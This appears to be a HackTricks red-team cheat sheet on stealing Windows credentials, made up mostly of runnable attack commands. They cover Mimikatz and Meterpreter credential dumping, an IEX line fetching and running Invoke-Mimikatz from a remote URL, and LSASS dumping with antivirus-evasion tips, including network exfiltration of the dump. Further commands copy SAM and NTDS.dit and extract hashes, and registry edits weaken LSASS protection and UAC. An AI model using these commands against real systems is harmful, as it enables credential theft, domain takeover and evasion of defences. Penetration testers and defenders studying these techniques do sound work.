Stealing Windows Credentials

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Credentials Mimikatz

#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Find other things that Mimikatz can do in this page.

Invoke-Mimikatz

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'

Learn about some possible credentials protections here. This protections could prevent Mimikatz from extracting some credentials.

Credentials with Meterpreter

Use the Credentials Plugin that I have created to search for passwords and hashes inside the victim.

#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump

#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"

#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"

Bypassing AV

Procdump + Mimikatz

As Procdump from SysInternals is a legitimate Microsoft tool, it’s not detected by Defender.
You can use this tool to dump the lsass process, download the dump and extract the credentials locally from the dump.

You could also use SharpDump.

#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Get it from webdav
\\live.sysinternals.com\tools\procdump.exe -accepteula -ma lsass.exe lsass.dmp

//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords

This process is done automatically with SprayKatz: ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

Note: Some AV may detect as malicious the use of procdump.exe to dump lsass.exe, this is because they are detecting the string “procdump.exe” and “lsass.exe”. So it is stealthier to pass as an argument the PID of lsass.exe to procdump instead of the name lsass.exe.

Dumping lsass with comsvcs.dll

A DLL named comsvcs.dll found in C:\Windows\System32 is responsible for dumping process memory in the event of a crash. This DLL includes a function named MiniDumpW, designed to be invoked using rundll32.exe.
It is irrelevant to use the first two arguments, but the third one is divided into three components. The process ID to be dumped constitutes the first component, the dump file location represents the second, and the third component is strictly the word full. No alternative options exist.
Upon parsing these three components, the DLL is engaged in creating the dump file and transferring the specified process’s memory into this file.
Utilization of the comsvcs.dll is feasible for dumping the lsass process, thereby eliminating the need to upload and execute procdump. This method is described in detail at https://en.hackndo.com/remote-lsass-dump-passwords/.

The following command is employed for execution:

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

You can automate this process with lssasy.

Dumping lsass with Task Manager

  1. Right click on the Task Bar and click on Task Manager
  2. Click on More details
  3. Search for “Local Security Authority Process” process in the Processes tab
  4. Right click on “Local Security Authority Process” process and click on “Create dump file”.

Dumping lsass with procdump

Procdump is a Microsoft signed binary which is a part of sysinternals suite.

Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp

Dumpin lsass with PPLBlade

PPLBlade is a Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

LalsDumper – SSP-based LSASS dumping without MiniDumpWriteDump

Ink Dragon ships a three-stage dumper dubbed LalsDumper that never calls MiniDumpWriteDump, so EDR hooks on that API never fire:

  1. Stage 1 loader (lals.exe) – searches fdp.dll for a placeholder consisting of 32 lower-case d characters, overwrites it with the absolute path to rtu.txt, saves the patched DLL as nfdp.dll, and calls AddSecurityPackageA("nfdp","fdp"). This forces LSASS to load the malicious DLL as a new Security Support Provider (SSP).
  2. Stage 2 inside LSASS – when LSASS loads nfdp.dll, the DLL reads rtu.txt, XORs each byte with 0x20, and maps the decoded blob into memory before transferring execution.
  3. Stage 3 dumper – the mapped payload re-implements MiniDump logic using direct syscalls resolved from hashed API names (seed = 0xCD7815D6; h ^= (ch + ror32(h,8))). A dedicated export named Tom opens %TEMP%\<pid>.ddt, streams a compressed LSASS dump into the file, and closes the handle so exfiltration can happen later.

Operator notes:

  • Keep lals.exe, fdp.dll, nfdp.dll, and rtu.txt in the same directory. Stage 1 rewrites the hard-coded placeholder with the absolute path to rtu.txt, so splitting them breaks the chain.
  • Registration happens by appending nfdp to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. You can seed that value yourself to make LSASS reload the SSP every boot.
  • %TEMP%\*.ddt files are compressed dumps. Decompress locally, then feed them to Mimikatz/Volatility for credential extraction.
  • Running lals.exe requires admin/SeTcb rights so AddSecurityPackageA succeeds; once the call returns, LSASS transparently loads the rogue SSP and executes Stage 2.
  • Removing the DLL from disk does not evict it from LSASS. Either delete the registry entry and restart LSASS (reboot) or leave it for long-term persistence.

CrackMapExec

Dump SAM hashes

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Dump LSA secrets

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

Dump the NTDS.dit from target DC

cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Dump the NTDS.dit password history from target DC

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history

Show the pwdLastSet attribute for each NTDS.dit account

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet

Stealing SAM & SYSTEM

This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they protected.

From Registry

The easiest way to steal those files is to get a copy from the registry:

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

Download those files to your Kali machine and extract the hashes using:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Volume Shadow Copy

You can perform copy of protected files using this service. You need to be Administrator.

Using vssadmin

vssadmin binary is only available in Windows Server versions

vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit

# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

But you can do the same from Powershell. This is an example of how to copy the SAM file (the hard drive used is “C:” and its saved to C:\users\Public) but you can use this for copying any protected file:

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
$voume.Delete();if($notrunning -eq 1){$service.Stop()}

Code from the book: https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html

Invoke-NinjaCopy

Finally, you could also use the PS script Invoke-NinjaCopy to make a copy of SAM, SYSTEM and ntds.dit.

Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"

Active Directory Credentials - NTDS.dit

The NTDS.dit file is known as the heart of Active Directory, holding crucial data about user objects, groups, and their memberships. It’s where the password hashes for domain users are stored. This file is an Extensible Storage Engine (ESE) database and resides at %SystemRoom%/NTDS/ntds.dit.

Within this database, three primary tables are maintained:

  • Data Table: This table is tasked with storing details about objects like users and groups.
  • Link Table: It keeps track of relationships, such as group memberships.
  • SD Table: Security descriptors for each object are held here, ensuring the security and access control for the stored objects.

More information about this: http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/

Windows uses Ntdsa.dll to interact with that file and its used by lsass.exe. Then, part of the NTDS.dit file could be located inside the lsass memory (you can find the latest accessed data probably because of the performance improve by using a cache).

Decrypting the hashes inside NTDS.dit

The hash is cyphered 3 times:

  1. Decrypt Password Encryption Key (PEK) using the BOOTKEY and RC4.
  2. Decrypt tha hash using PEK and RC4.
  3. Decrypt the hash using DES.

PEK have the same value in every domain controller, but it is cyphered inside the NTDS.dit file using the BOOTKEY of the SYSTEM file of the domain controller (is different between domain controllers). This is why to get the credentials from the NTDS.dit file you need the files NTDS.dit and SYSTEM (C:\Windows\System32\config\SYSTEM).

Copying NTDS.dit using Ntdsutil

Available since Windows Server 2008.

ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

You could also use the volume shadow copy trick to copy the ntds.dit file. Remember that you will also need a copy of the SYSTEM file (again, dump it from the registry or use the volume shadow copy trick).

Extracting hashes from NTDS.dit

Once you have obtained the files NTDS.dit and SYSTEM you can use tools like secretsdump.py to extract the hashes:

secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt

You can also extract them automatically using a valid domain admin user:

secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

For big NTDS.dit files it’s recommend to extract it using gosecretsdump.

Finally, you can also use the metasploit module: post/windows/gather/credentials/domain_hashdump or mimikatz lsadump::lsa /inject

Extracting domain objects from NTDS.dit to an SQLite database

NTDS objects can be extracted to an SQLite database with ntdsdotsqlite. Not only secrets are extracted but also the entire objects and their attributes for further information extraction when the raw NTDS.dit file is already retrieved.

ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive

The SYSTEM hive is optional but allow for secrets decryption (NT & LM hashes, supplemental credentials such as cleartext passwords, kerberos or trust keys, NT & LM password histories). Along with other information, the following data is extracted : user and machine accounts with their hashes, UAC flags, timestamp for last logon and password change, accounts description, names, UPN, SPN, groups and recursive memberships, organizational units tree and membership, trusted domains with trusts type, direction and attributes…

Lazagne

Download the binary from here. you can use this binary to extract credentials from several software.

lazagne.exe all

Other tools for extracting credentials from SAM and LSASS

Windows credentials Editor (WCE)

This tool can be used to extract credentials from the memory. Download it from: http://www.ampliasecurity.com/research/windows-credentials-editor/

fgdump

Extract credentials from the SAM file

You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe

PwDump

Extract credentials from the SAM file

You can find this binary inside Kali, just do: locate pwdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump

PwDump7

Download it from: http://www.tarasco.org/security/pwdump_7 and just execute it and the passwords will be extracted.

Mining idle RDP sessions and weakening security controls

Ink Dragon’s FinalDraft RAT includes a DumpRDPHistory tasker whose techniques are handy for any red-teamer:

DumpRDPHistory-style telemetry collection

  • Outbound RDP targets – parse every user hive at HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers\*. Each subkey stores the server name, UsernameHint, and the last write timestamp. You can replicate FinalDraft’s logic with PowerShell:

    Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
    Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
      ForEach-Object {
          $server = Split-Path $_.Name -Leaf
          $user = (Get-ItemProperty $_.Name).UsernameHint
          "OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
      }
}

  • Inbound RDP evidence – query the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log for Event IDs 21 (successful logon) and 25 (disconnect) to map who administered the box:

    Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" \
  | Where-Object { $_.Id -in 21,25 } \
  | Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}

Once you know which Domain Admin regularly connects, dump LSASS (with LalsDumper/Mimikatz) while their disconnected session still exists. CredSSP + NTLM fallback leaves their verifier and tokens in LSASS, which can then be replayed over SMB/WinRM to grab NTDS.dit or stage persistence on domain controllers.

Registry downgrades targeted by FinalDraft

The same implant also tampers with several registry keys to make credential theft easier:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
  • Setting DisableRestrictedAdmin=1 forces full credential/ticket reuse during RDP, enabling pass-the-hash style pivots.
  • LocalAccountTokenFilterPolicy=1 disables UAC token filtering so local admins get unrestricted tokens over the network.
  • DSRMAdminLogonBehavior=2 lets the DSRM administrator log on while the DC is online, giving attackers another built-in high-privilege account.
  • RunAsPPL=0 removes LSASS PPL protections, making memory access trivial for dumpers such as LalsDumper.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks